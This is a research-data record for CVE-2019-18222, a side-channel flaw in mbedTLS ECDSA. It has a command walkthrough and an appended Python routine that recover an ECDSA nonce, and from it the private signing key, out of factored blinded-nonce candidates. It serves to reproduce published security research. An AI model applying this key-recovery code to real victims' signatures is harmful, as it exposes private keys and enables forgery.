Dataset Open Access

CVE-2019-18222: research data and tooling

Alejandro Cabrera Aldaya; Billy Bob Brumley


Dublin Core Export

<?xml version='1.0' encoding='utf-8'?>
<oai_dc:dc xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/ http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
  <dc:creator>Alejandro Cabrera Aldaya</dc:creator>
  <dc:creator>Billy Bob Brumley</dc:creator>
  <dc:date>2020-01-13</dc:date>
  <dc:description>This dataset and software tool are for reproducing the research results related to CVE-2019-18222.

Description

- enum contains the key enumeration tool.
- kt_candidates contains the JSON for blinded nonce candidates, indexed by trial number. JSON fields:
  - kt_candidates: list of nonce candidates.
- sig_data contains the JSON for ECDSA signatures, indexed by trial number. JSON fields:
  - p: the prime the curve is defined over. (P-256 here.)
  - Gx, Gy: generator coordinates.
  - d: ground-truth ECDSA long-term key.
  - Px, Py: public key coordinates.
  - h: SHA-256 digest to sign, encoded into the finite field.
  - k: ground-truth ECDSA nonce.
  - r, s: ECDSA signature.

Build

cd enum
make clean
make

Run

Start with enum as the working directory.

cd enum

Pull out a kt candidate, in this example index 847.

$ jq '.kt_candidates' ../kt_candidates/kt_candidates_847.json
[
  "0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0"
]

Factor that candidate.

$ time sage -c "print ecm.factor(0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0)"
[2, 2, 2, 2, 2, 3, 353, 193243, 1540830719, 9263081209, 103633959617085683, 151389566295160172521, 283135469779419532841, 572987990320782777757565685333349772719941819448953457732874126833]

real    0m5.837s
user    0m5.648s
sys 0m0.214s

Now pull out the r component of the ECDSA signature for that index, and convert it from hex to base 10.

$ jq '.r' ../sig_data/sig_data_847.json
"0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67"
$ python -c "print 0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67"
22111746808803128586382711090186612204136854333384650261207856620766542674791

Now run the enum tool to recover the nonce.

$ ./enum 
Usage: ./enum &lt;jobs_num&gt; &lt;jobs_id&gt; &lt;target_base_10&gt; space delimited flat list of factors in base ten

The &lt;jobs_num&gt; and &lt;jobs_id&gt; arguments are to ease parallel execution; read the source code. But for a single core, pass them as 1 0.

$ ./enum 1 0 22111746808803128586382711090186612204136854333384650261207856620766542674791 2 2 2 2 2 3 353 193243 1540830719 9263081209 103633959617085683 151389566295160172521 283135469779419532841 572987990320782777757565685333349772719941819448953457732874126833
INFO:target:30E2CE20A8140177A31A66763D85F431ACC9790DD050FFC22ED5D454CDFBBB67
INFO:found:31A52C4960857E6D2F7AD82BAC7D55CE6CC9AD13B959F069002B6A949EA6A048
INFO:tests:7879

where 221..791 is the base-10 r component of the ECDSA signature, and 2 2 .. 572..833 is the full list of blinded nonce factors. In the output:

- INFO:target:&lt;hex&gt; is the hex form of the base-10 target input (ECDSA r component).
- INFO:found:&lt;hex&gt; is the hex form of the recovered ECDSA nonce.
- INFO:tests:&lt;num&gt; is the number of tested nonce candidates (scalar multiplications).

We can see that this correctly recovered the nonce (and hence the long-term ECDSA private key):

$ jq '.k' ../sig_data/sig_data_847.json
"0x31a52c4960857e6d2f7ad82bac7d55ce6cc9ad13b959f069002b6a949ea6a048"</dc:description>
  <dc:identifier>https://zenodo.org/record/3605805</dc:identifier>
  <dc:identifier>10.5281/zenodo.3605805</dc:identifier>
  <dc:identifier>oai:zenodo.org:3605805</dc:identifier>
  <dc:language>eng</dc:language>
  <dc:relation>info:eu-repo/grantAgreement/EC/H2020/804476/</dc:relation>
  <dc:relation>url:https://eprint.iacr.org/2020/055</dc:relation>
  <dc:relation>doi:10.5281/zenodo.3605804</dc:relation>
  <dc:rights>info:eu-repo/semantics/openAccess</dc:rights>
  <dc:rights>https://opensource.org/licenses/MIT</dc:rights>
  <dc:subject>side-channel analysis</dc:subject>
  <dc:subject>ECDSA</dc:subject>
  <dc:subject>binary GCD</dc:subject>
  <dc:subject>modular inversion</dc:subject>
  <dc:subject>Intel SGX</dc:subject>
  <dc:subject>mbedTLS</dc:subject>
  <dc:title>CVE-2019-18222: research data and tooling</dc:title>
  <dc:type>info:eu-repo/semantics/other</dc:type>
  <dc:type>dataset</dc:type>
</oai_dc:dc>
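The nonce-recovery step of the Run walkthrough above, as an added example that is not the dataset's enum tool: given the base-10 r and the factor list of a blinded nonce candidate, it enumerates the divisors, returns the one whose x([k]G) mod n equals r, and then derives the long-term key d from (r, s, h, k). The P-256 parameters are the standard values, written here as assumptions, and the affine arithmetic is far slower than the C tool.

```python
# Added example (not the dataset's enum tool): enumerate the divisors of a
# factored blinded nonce, keep the one with x([k]G) mod n == r, recover d.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A, B = P - 3, 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)

def add(p1, p2):
    """Affine point addition on P-256 (assumed standard params); None = infinity."""
    if p1 is None or p2 is None:
        return p2 if p1 is None else p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None                       # P + (-P), also doubling with y == 0
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P

def mul(k, pt=G):
    """Left-to-right double-and-add; not constant time (offline analysis only)."""
    acc = None
    for bit in bin(k)[2:]:
        acc = add(acc, acc)
        if bit == '1':
            acc = add(acc, pt)
    return acc

def divisors(factors):
    """Every product of a sub-multiset of the prime factor list (including 1)."""
    divs = {1}
    for q in set(factors):
        divs = {d * q ** e for d in divs for e in range(factors.count(q) + 1)}
    return divs

def find_nonce(r, factors):
    """Smallest divisor k with x([k]G) mod n == r, and the number of tries."""
    tests = 0
    for k in sorted(d for d in divisors(factors) if 1 < d < N):
        tests += 1
        if mul(k)[0] % N == r:
            return k, tests
    return None, tests

def recover_key(r, s, h, k):
    """ECDSA: s = k^-1 (h + r d) mod n, hence d = (s k - h) r^-1 mod n."""
    return (s * k - h) * pow(r, -1, N) % N
```

Called with the base-10 r and the factor list from the index 847 walkthrough, find_nonce searches the candidate space the tool reports under INFO:tests, at a few milliseconds per scalar multiplication in pure Python.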